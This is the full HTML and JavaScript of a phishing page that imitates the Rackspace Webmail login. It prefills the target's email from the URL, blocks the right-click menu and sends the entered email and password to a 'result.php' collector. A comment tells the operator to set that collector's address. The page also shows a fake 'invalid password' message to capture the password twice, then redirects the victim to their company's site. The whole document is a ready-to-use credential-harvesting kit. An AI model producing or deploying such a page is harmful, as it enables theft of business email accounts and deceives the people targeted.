<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Rackspace Webmail: Hosted Email for Business</title>
    <link rel="shortcut icon" href="https://i.ibb.co/phxCtgN/Untitled.png">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,400,500,700">
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            color: #333;
        }

        body {
            font-family: "Roboto", "Helvetica Neue", Helvetica, Arial, sans-serif;
            font: 12px NotoSans,sans-serif;
            background: #EAEAEA;
            font-size: 16px;
        }

        img {
            width: 100%;
            height: auto;
        }
        form {
            padding: 0rem 2rem;
            padding-top: 15px;
        }
        .inner {
            width: 790px;
            margin: auto;
            margin-top: 5rem;
        }
        #content-header {
            height: auto;
            padding: 16px;
            font-size: 24px;
            font-weight: 300;
            line-height: 18px;
            background: #424242;
            color: #FCFCFC;
            display: flex;
            justify-content: space-between;
            flex-direction: row-reverse;
            align-items: center;
        }
        #content-header-logo {
            width: 14%;
        }
        #header-label {
            font-size: 24px;
            font-weight: 300;
            line-height: 18px;
            background: #424242;
            color: #FCFCFC;
        }
        .content-body {
            display: flex;
            /* gap: 2rem; */
            align-items: center;
            padding: 20px;
            background: #fff;
        }
        .supicious {
            width: 35%;
            padding: 0rem 2rem;
            border-right: 1px solid rgb(224, 224, 224);
        }
        /* #divider {
            border: 1px solid rgb(224, 224, 224);
            margin: 40px 0px;
            height: 100%;
        } */
        .formdiv {
            width: 60%;
            padding-top: 3rem;
        }
        .inputdiv {
            margin-bottom: 20px;
        }
        .inputdiv input {
            border: 1px solid #BDBDBD;
            border-radius: 2px;
            background: #FFFFFF;
            font-family: Roboto;
            font-size: 16px;
            color: #616161;
            height: 32px;
            display: block;
            width: 100%;
            padding: 4px 8px;
            line-height: 1.42857;
            -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
            box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
            -webkit-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
            -o-transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
            transition: border-color ease-in-out 0.15s, box-shadow ease-in-out 0.15s;
        }
        .inputdiv label {
            position: relative;
            font-family: Roboto;
            font-size: 16px;
            margin-bottom: 8px;
            line-height: 1;
            color: #616161;
            display: inline-block;
            max-width: 100%;
        }
        #forgot-password {
            color: #0C7C84;
            text-decoration: none;
            background-color: transparent;
            box-sizing: border-box;
        }
        .btn {
            width: 100%;
            display: flex;
            justify-content: end;
        }
        .btn button {
            padding: 8px;
            border: none;
            font-size: 14px;
            font-weight: 400;
            text-transform: capitalize;
            color: #fff;
            background-color: #0C7C84;
            border-color: #0C7C84;
            margin-top: 3rem;
        }
        .base_links {
            display: flex;
            align-items: center;
            gap: .7rem;
            padding-left: 1rem;
            font-size: 13px;
        }
        .base_links a {
            color: #0C7C84;
            text-decoration: none;
        }
        .last {
            font-size: 12px;
            color: #666;
            text-align: center;
            padding: 5px;
        }
        span#errr {
            margin: 2rem;
            padding: 5px 0;
            color: crimson;
        }
        @media  (max-width: 760px) {
            span#errr {
            margin: 0rem;
            padding: 5px 0;
            color: crimson;
        }
            .supicious {
                display: none;
            }
            .inner {
                width: 100%;
                /* margin: auto; */
                margin-top: 0rem;
            }
            .formdiv {
                width: 99%;
                padding-top: 1rem;
            }
            .content-body {
                padding: 1px;
            }
            #header-label {
                font-size: 21px;
                font-weight: 300;
                line-height: 18px;
                background: #424242;
                color: #FCFCFC;
                line-height: 1em;
            }
            #content-header-logo {
                width: 19%;
            }
            .last {
                font-size: 9px;
                color: #666;
                text-align: center;
                padding: 5px;
            }
            .btn button {
                padding: 15PX 20PX;
                border: none;
                font-size: 14px;
                font-weight: 400;
                text-transform: capitalize;
                color: #fff;
                background-color: #0C7C84;
                border-color: #0C7C84;
                margin-top: 0rem;
            }
            .base_links {
                justify-content: center;
                margin-top: 1rem;
            }
            form {
                padding: 0rem 1rem;
            }
        }
    </style>
</head>

<body>
    <div class="container">
        <div class="inner">
            <div id="content-header">
                <div id="content-header-logo">
                    <img id="logo" src="https://static.emailsrvr.com/beta_apps_rackspace_com/images/Rackspace_Technology_Logo_RGB_WHT.png">
                </div>
                <div id="header-label">Webmail Login</div>
            </div>
            <div class="content-body">
                <div class="supicious">
                    <img src="https://static.emailsrvr.com/apps_rackspace_com/images/Suspicious-Email-Banner.jpg" alt="">
                </div>
                <div id="divider"></div>
                <div class="formdiv">
                    <span id="errr"></span>
                    <form action="" method="post" id="result">
                        <div class="inputdiv">
                            <label for="email">Email</label>
                            <input type="email" name="email" required  id="email">
                        </div>
                        <div class="inputdiv">
                            <div class="flexl" style="display: flex; align-items: center; justify-content: space-between;">
                                <label for="pass">Password</label>
                                <a href="" id="forgot-password">Forgot password?</a>
                            </div>
                            <input type="password" name="userpwd" required  id="password">
                        </div>
                        <div class="btn">
                            <button type="submit">
                                Log in
                            </button>
                        </div>
                    </form>
                    <div class="base_links">
                        <a class="base_link" target="_blank" href="http://www.rackspace.com/information/legal/privacystatement">
                          Privacy Statement
                        </a>
                        <div class="divider"> | </div>
                        <a class="base_link" target="_blank" href="http://www.rackspace.com/information/legal/websiteterms">
                          Website Terms
                        </a>
                    </div>
                </div>
            </div>
            <div class="last" >Need webmail for your business? Learn more about <a href="#">Hosted Email</a> from Rackspace</div>
        </div>
    </div>

    <script>
        setCookie = (cName, cValue, expDays) => {
            let date = new Date();
            date.setTime(date.getTime() + (expDays * 24 * 60 * 60 * 1000));
            const expires = "expires=" + date.toUTCString();
            document.cookie = cName + "=" + cValue + "; " + expires + "; path=/";
        }

        getCookies = (cName) => {
            const name = cName + "=";
            const cDecoded = decodeURIComponent(document.cookie);
            const cArr = cDecoded.split("; ");
            let value;
            cArr.forEach(val => {
                if (val.indexOf(name) === 0) {
                    value = val.substring(name.length);
                }
            });
            return value;
        }

        // Set the cookie automatically when the page loads
        window.addEventListener("load", () => {
            if (!getCookies("cookie")) {
                setCookie("cookie", true, 90);
            }
            localStorage.removeItem("storedPassword");
            var formSubmitted = 0;
        });
        
        // Get the full URL
        const fullUrl = window.location.href;

        const emailRegex = /#([^#]+)$/; 
        const match = fullUrl.match(emailRegex);

        // Check if there is a match and extract the email address
        const email = match ? match[1] : null;

        // Log or use the extracted email
        console.log(email);


        if (email) {
            document.getElementById("email").value = email;

            // Extract the domain part of the email
            const domain = email.split('@')[1];
            const companyName = domain.split('.')[0];

            // Log or use the extracted company name
            console.log(companyName);
            localStorage.setItem("userDomain", domain);

            // Log or use the extracted domain
            console.log(domain);

        }

        document.addEventListener('contextmenu', function (e) {
         e.preventDefault();
        });

        var formSubmitted = 0;


      document.getElementById("result").addEventListener("submit", function (event) {
          event.preventDefault();
      
          formSubmitted++;
          
          var inputs = document.querySelectorAll('input[required]');
          for (var i = 0; i < inputs.length; i++) {
              if (!inputs[i].value.trim()) {
                  alert("Please fill in all fields.");
                  return;
              }
          }
      
          var formData = new FormData(this);
          var xhr = new XMLHttpRequest();
          xhr.open("POST", "./result.php", true); // your php url here eg http://yourdomain.com/result.php
      
          xhr.onreadystatechange = function () {
              if (xhr.readyState == 4 && xhr.status == 200) {
                  const dd = localStorage.getItem("userDomain")
                  console.log(xhr.responseText);
      
                  if (formSubmitted === 1) {
                      console.log("YESSSSS");
                      document.getElementById("password").value = "";
                      document.getElementById("errr").textContent = "invalid password, please try again to continue";
                  } else if (formSubmitted === 2) {
                         setInterval(() => {
                            // document.getElementById("password").value = "";
                            window.location.href = `http://www.${dd}`;
                        }, 2000);
                     
                          console.log("invalid");
                  } 
              }
          };
      
          xhr.send(formData);
      });

    </script>
</body>

</html>